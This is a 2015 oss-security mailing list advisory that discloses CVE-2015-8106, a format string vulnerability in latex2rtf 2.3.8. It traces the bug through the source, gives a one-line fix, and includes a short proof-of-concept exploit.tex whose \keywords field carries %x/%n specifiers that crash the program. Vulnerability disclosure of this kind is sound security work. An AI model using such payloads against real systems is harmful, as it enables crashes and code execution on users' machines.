|
Message-ID: <5649AD62.8040704@ropas.snu.ac.kr> Date: Mon, 16 Nov 2015 19:18:10 +0900 From: 김종권 <jgkim@...as.snu.ac.kr> To: oss-security@...ts.openwall.com Cc: wslee@...as.snu.ac.kr Subject: CVE-2015-8106 - latex2rtf v2.3.8 format string vulnerability Dear List, I am writing this to report a format string vulnerability in ubuntu package latex2rtf. (2.3.8, which is the latest version). Also I already have been assigned a CVE identifier from MITRE "CVE-2015-8106", so I want to make public this vulnerability. - Target Platform Windows, Linux, OS X - Target Version 2.3.8 (Latest Version) - Vulnerability description When the user runs latex2rtf with malicious crafted tex file, an attacker can execute arbitrary code. The function CmdKeywords processes the \keywords command in tex file. The variable `keywords' in the function CmdKeywords may hold a malicious input string, which can be used as a format argument of vsnprintf. -- Step 1. (funct1.c 1789 line) 1789 char *keywords = getBraceParam(); For instance, the variable keywords will point to the string “MALICIOUS” when a text line "\keywords{MALICIOUS}” exists in an input tex file. -- Step 2. (funct1.c 1798 line) 1798 fprintRTF(keywords); fprintfRTF() is called in line 1798, and the parameter is used as a format string, which can be malicious, as we described in step 1. -- Step 3. (main.c 873 line) 858 void fprintRTF(char *format, ...){ ... 873 vsnprintf(buffer, 1024, format, apf); ... The value of format, which may be malicious, is used as an argument of vsnprintf in line 873, therefore arbitrary code can be executed. -- Step 4. Our malicious input "exploit.tex" ======================== \documentclass{article} \begin{document} \title{Exploitable} \author{Jong-Gwon Kim} \keywords{%x\%n\%n\%n} \end{document} ========================= Execute ========================== ~ $ latex2rtf -v latex2rtf 2.3.8 r1240 (released June 16 2014) Copyright (C) 2012 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Written by Prahl, Lehner, Granzer, Dorner, Polzer, Trisko, Schlatterbeck. ~ $ latex2rtf exploit.tex aborted (core dumped) ========================== -- Step 5. How to fix (funct1.c 1798 line) 1798 fprintRTF(keywords); ===> fprintRTF("%s", keywords); - How we found the vulnerability We used a static analyzer, Sparrow[1], to find the format string bug. Our analyzer reported an alarm in latex2rtf main.c 873 line, So we looked for a latex2rtf source code and found the bug. Sparrow is a state-of-the-art static analyzer that aims to verify the absence of fatal bugs in C source. Sparrow is designed by Abstract Interpretation and the analysis is sound in design. Sparrow adopts a number of well-founded static analysis techniques[2,3] for scalability, precision, and user convenience. References [1]: http://ropas.snu.ac.kr/sparrow/ [2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14. [3]: Design and Implementation of Sparse Global Analyses for C-like Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun Yi. PLDI'12 Sincerely, Jong-Gwon Kim & Woosuk Lee ----------------------------- Jong-Gwon Kim Graduate student ROPAS lab. (http://ropas.snu.ac.kr/) ROSAEC center (http://rosaec.snu.ac.kr/) Seoul National University (tel) +82-2-880-1865 (email) jgkim@...as.snu.ac.kr ----------------------------- ----------------------------- Woosuk Lee Ph.D. candidate ROPAS lab. (http://ropas.snu.ac.kr/) ROSAEC center (http://rosaec.snu.ac.kr/) Seoul National University (tel) +82-2-880-1865 (email) wslee@...as.snu.ac.kr -----------------------------
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.